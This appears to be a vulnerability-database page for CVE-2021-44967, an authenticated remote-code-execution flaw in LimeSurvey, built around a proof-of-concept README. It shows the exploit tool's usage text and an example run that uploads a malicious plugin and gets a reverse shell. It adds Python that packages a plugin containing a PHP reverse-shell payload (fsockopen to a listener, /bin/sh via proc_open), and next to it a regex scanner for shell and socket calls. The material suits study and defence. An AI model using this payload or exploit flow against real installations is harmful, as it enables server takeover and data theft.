Related vulnerability
Title:
LimeSurvey code issue vulnerability
(CVE-2021-44967)
Description: LimeSurvey (formerly PHPSurveyor) is an open-source online survey application from the LimeSurvey team; it supports survey development, questionnaire publishing and data collection. LimeSurvey 5.2.4 contains a security vulnerability that allows a remote malicious user to upload arbitrary PHP code files.
Description
POC for CVE-2021-44967: LimeSurvey RCE
Introduction
# CVE-2021-44967: LimeSurvey RCE
## Description
This Proof-of-Concept (POC) exploits CVE-2021-44967 by uploading and activating a malicious LimeSurvey PHP plugin as an administrator in order to obtain a reverse shell.
A Remote Code Execution (RCE) vulnerability exists in LimeSurvey 5.2.4 via the upload-and-install plugins function, which lets a remote malicious user with administrator access upload an arbitrary PHP code file.
Severity: 8.3 HIGH as quoted. Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. Note that this vector scores 8.8 under CVSS 3.1, not 8.3, and that because plugin upload requires an administrator account the stricter PR:H reading (7.2) is arguably the right one; defer to the NVD entry in the references for the official rating.
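The plugin package that the POC uploads, and the check a defender would run afterwards, as an added example (this is not code from the original POC and not LimeSurvey's own code). `build_plugin_zip` produces the `<Name>/config.xml` plus `<Name>/<Name>.php` layout of an uploaded LimeSurvey plugin, with the PHP class extending `PluginBase` and the payload placed in `init()` so that it runs once the plugin is activated; the exact `config.xml` element names, the use of `init()` as the trigger, the listener address and the scanned directory are all assumptions made for this example. `scan_plugins_dir` is the triage step: walk an unpacked `upload/plugins/` tree and report every PHP file that calls a shell, socket or eval primitive, which is how a plugin of this kind shows up on a host where the POC has been run.

```python
"""
Added example (not part of the original POC or of LimeSurvey): build the kind
of plugin archive the POC uploads, then triage an unpacked upload/plugins tree
for plugins whose PHP calls shell/socket/eval primitives.
"""
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Assumed LimeSurvey plugin layout: <Name>/config.xml + <Name>/<Name>.php, with
# the class extending PluginBase. Element names below are assumptions for this
# example, not a verified copy of the LimeSurvey schema.
CONFIG_XML = """<?xml version="1.0" encoding="UTF-8"?>
<config>
  <metadata>
    <name>{name}</name>
    <type>plugin</type>
    <author>example</author>
    <license>GPL</license>
    <version>1.0.0</version>
    <description>{name}</description>
  </metadata>
  <compatibility>
    <version>5.0</version>
    <version>6.0</version>
  </compatibility>
</config>
"""

# Payload is placed in init(), assumed here to run whenever the active plugin loads.
PLUGIN_PHP = """<?php
class {name} extends PluginBase
{{
    protected $storage = 'DbStorage';
    static protected $description = '{name}';
    static protected $name = '{name}';

    public function init()
    {{
        {payload}
    }}
}}
"""


def build_plugin_zip(name: str, payload_php: str) -> bytes:
    """Return the bytes of a plugin archive using the assumed layout above."""
    if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", name):
        raise ValueError("plugin name must be a valid PHP class name")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}/config.xml", CONFIG_XML.format(name=name))
        zf.writestr(f"{name}/{name}.php", PLUGIN_PHP.format(name=name, payload=payload_php))
    return buf.getvalue()


def list_plugin_files(blob: bytes) -> list[str]:
    """Sorted member names of a plugin archive (for inspection before upload)."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return sorted(zf.namelist())


# Detection side: primitives a survey plugin has no business calling.
SUSPICIOUS = re.compile(
    r"\b(shell_exec|exec|system|passthru|proc_open|popen|fsockopen|pcntl_exec|eval|assert)\s*\("
)


def scan_plugins_dir(root: str) -> dict[str, list[str]]:
    """Map plugin directory name -> 'file:function' hits for every .php under root."""
    findings: dict[str, list[str]] = {}
    for php in Path(root).rglob("*.php"):
        plugin = php.relative_to(root).parts[0]
        code = php.read_text(errors="replace")
        hits = [f"{php.name}:{m.group(1)}" for m in SUSPICIOUS.finditer(code)]
        if hits:
            findings.setdefault(plugin, []).extend(hits)
    return findings


def demo() -> dict[str, list[str]]:
    """Build one benign and one malicious plugin (constructed data), unpack both, scan."""
    benign = build_plugin_zip("HelloWorld", "$this->subscribe('beforeSurveyPage');")
    # Listener address is a constructed placeholder, not a real host.
    evil = build_plugin_zip(
        "RevShell",
        "$s=fsockopen('10.0.0.1',4444); proc_open('/bin/sh -i', [0=>$s,1=>$s,2=>$s], $p);",
    )
    with tempfile.TemporaryDirectory() as d:
        for blob in (benign, evil):
            with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                zf.extractall(d)
        return scan_plugins_dir(d)


if __name__ == "__main__":
    print(demo())
```

Running the block prints the scan result for the two constructed plugins; point `scan_plugins_dir` at the real `upload/plugins/` directory of a LimeSurvey install to triage it, and treat any hit on `fsockopen` or `proc_open` inside a plugin as a reason to pull that file together with the web server logs covering the upload.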
## Usage
```text
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
[--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]
POC for CVE-2021-44967 (LimeSurvey RCE)
options:
-h, --help show this help message and exit
-t, --url URL LimeSurvey Target URL
-u, --username USERNAME
LimeSurvey username
-p, --password PASSWORD
LimeSurvey password
-f, --file FILE Custom PHP payload file
--listen-ip LISTEN_IP
Listening IP / Interface
--listen-port LISTEN_PORT
Listening Port
-a, --useragent USERAGENT
User agent to use when sending requests
-x, --proxy PROXY HTTP(s) proxy to use when sending requests (e.g. -x http://127.0.0.1:8080)
-v, --verbose Verbosity enabled - additional output flag
```
## Example
```sh
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shell ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Tested on LimeSurvey Community Edition Version 6.6.4. Note that 6.6.4 is well past the 5.2.4 release the CVE was filed against: the plugin upload and activation path used here is an administrative feature, so valid administrator credentials are the real prerequisite for this POC.
## References
- [CVE-2021-44967](https://nvd.nist.gov/vuln/detail/CVE-2021-44967)
- [Original POC](https://github.com/Y1LD1R1M-1337/Limesurvey-RCE)
File snapshot
[4.0K] /data/pocs/4622b2c3398e4d08ad31245f968c7e9e1782b67c
├── [6.8K] limesurvey_rce.py
└── [2.0K] README.md
0 directories, 2 files